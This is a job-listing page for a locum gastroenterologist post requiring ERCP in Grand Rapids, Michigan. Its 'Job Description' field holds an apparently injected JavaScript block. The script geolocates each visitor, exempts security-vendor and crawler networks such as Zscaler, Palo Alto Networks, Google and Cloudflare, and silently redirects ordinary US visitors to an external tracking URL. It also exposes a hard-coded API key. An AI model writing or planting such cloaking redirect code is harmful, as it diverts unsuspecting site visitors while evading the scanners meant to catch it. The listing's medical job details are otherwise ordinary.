Locum Gastroenterologist (ERCP Required)

Grand Rapids, MI
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/6ff9573b93e98619/efdb75c553412a85b75bfcc26ea891554e74e8d81f0aae0266840fd50ad3b673/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Seeking an experienced Locum Gastroenterologist for hospital-based coverage in Michigan.

  • Provide endoscopy procedures and manage GI consults during scheduled hours, with no call or weekend duties.
  • Schedule: Monday–Friday, 7:00 AM–4:30 PM, with single-day or daily coverage.
  • Requires ERCP proficiency and post-fellowship experience, with 2 years of GI experience.
  • Average daily volume includes ~18 outpatient and ~20 inpatient scopes.
  • Support includes 2 GI physicians and 2 APPs. All services are onsite with access to lab and X-ray, using Cerner EMR.
  • Must hold Michigan medical license; DEA preferred.
    Compensation ranges from $180–$220/hour.
    Benefits include a flexible schedule.